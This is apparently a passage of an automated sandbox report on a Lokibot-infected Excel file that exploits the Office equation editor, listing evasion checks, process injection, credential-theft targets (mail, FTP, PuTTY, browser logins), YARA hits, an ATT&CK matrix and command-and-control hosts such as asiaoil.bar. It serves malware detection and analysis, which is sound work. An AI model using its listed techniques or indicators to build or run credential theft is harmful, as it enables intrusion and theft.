              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_5-6942
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2364Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe TID: 2836Thread sleep time: -1020000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-6747
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7C FindFirstFileA,FindClose,4_2_00405D7C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004053AA
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402630 FindFirstFileA,4_2_00402630
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,6_2_00403D74
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_4-3205
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeAPI call chain: ExitProcess graph end nodegraph_5-6748
              Source: vbc.exe, 00000004.00000002.465419977.0000000000894000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B0EEB _memset,IsDebuggerPresent,5_2_008B0EEB
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B1B15 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_008B1B15
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DA3
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AF18E GetProcessHeap,5_2_008AF18E
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AE750 mov eax, dword ptr fs:[00000030h]5_2_008AE750
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120402 mov eax, dword ptr fs:[00000030h]5_2_00120402
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120616 mov eax, dword ptr fs:[00000030h]5_2_00120616
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_001206C7 mov eax, dword ptr fs:[00000030h]5_2_001206C7
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120706 mov eax, dword ptr fs:[00000030h]5_2_00120706
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_00120744 mov eax, dword ptr fs:[00000030h]5_2_00120744
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040317B mov eax, dword ptr fs:[00000030h]6_2_0040317B
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AE750 mov eax, dword ptr fs:[00000030h]6_2_008AE750
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFEB0 SetUnhandledExceptionFilter,5_2_008AFEB0
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_008AFEE1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFEB0 SetUnhandledExceptionFilter,6_2_008AFEB0
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFEE1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_008AFEE1

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory written: C:\Users\user\AppData\Local\Temp\xmtxpy.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B350C cpuid 5_2_008B350C
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AF9DD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_008AF9DD
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,4_2_00405AA7
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00406069 GetUserNameW,6_2_00406069

              Stealing of Sensitive Information

              barindex
              Yara detected Lokibot
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: PopPassword6_2_0040D069
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: SmtpPassword6_2_0040D069
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts12
              Native API              		Path Interception1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		Exfiltration Over Other Network Medium15
              Ingress Tool Transfer              		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
              System Shutdown/Reboot
              Default Accounts13
              Exploitation for Client Execution              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		2
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol1
              Man in the Browser              		Exfiltration Over Bluetooth1
              Encrypted Channel              		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)111
              Process Injection              		1
              Extra Window Memory Injection              		Security Account Manager2
              File and Directory Discovery              		SMB/Windows Admin Shares2
              Data from Local System              		Automated Exfiltration4
              Non-Application Layer Protocol              		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
              Masquerading              		NTDS26
              System Information Discovery              		Distributed Component Object Model1
              Email Collection              		Scheduled Transfer124
              Application Layer Protocol              		SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Virtualization/Sandbox Evasion              		LSA Secrets131
              Security Software Discovery              		SSH1
              Clipboard Data              		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Access Token Manipulation              		Cached Domain Credentials11
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items111
              Process Injection              		DCSync1
              System Owner/User Discovery              		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
              Remote System Discovery              		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 569962 Sample: _2201S_BUSAN_HOCHIMINH_.xlsx Startdate: 10/02/2022 Architecture: WINDOWS Score: 100 38 asiaoil.bar 2->38 48 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 15 other signatures 2->54 9 EQNEDT32.EXE 12 2->9         started        14 EXCEL.EXE 33 27 2->14         started        signatures3 process4 dnsIp5 44 198.46.132.195, 49165, 80 AS-COLOCROSSINGUS United States 9->44 32 C:\Users\user\AppData\Local\...\.win32[1].exe, PE32 9->32 dropped 34 C:\Users\Public\vbc.exe, PE32 9->34 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 9->70 16 vbc.exe 19 9->16         started        36 C:\Users\...\~$_2201S_BUSAN_HOCHIMINH_.xlsx, data 14->36 dropped file6 signatures7 process8 file9 28 C:\Users\user\AppData\Local\Temp\xmtxpy.exe, PE32 16->28 dropped 46 Machine Learning detection for dropped file 16->46 20 xmtxpy.exe 16->20         started        signatures10 process11 signatures12 56 Tries to steal Mail credentials (via file registry) 20->56 58 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 20->58 60 Injects a PE file into a foreign processes 20->60 23 xmtxpy.exe 54 20->23         started        process13 dnsIp14 40 104.21.49.244, 49170, 49172, 49174 CLOUDFLARENETUS United States 23->40 42 asiaoil.bar 172.67.197.66, 49166, 49167, 49168 CLOUDFLARENETUS United States 23->42 30 C:\Users\user\AppData\...\5879F5.exe (copy), PE32 23->30 dropped 62 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->62 64 Tries to steal Mail credentials (via file / registry access) 23->64 66 Tries to harvest and steal ftp login credentials 23->66 68 Tries to harvest and steal browser information (history, passwords, etc) 23->68 file15 signatures16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              _2201S_BUSAN_HOCHIMINH_.xlsx35%VirustotalBrowse
              _2201S_BUSAN_HOCHIMINH_.xlsx33%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
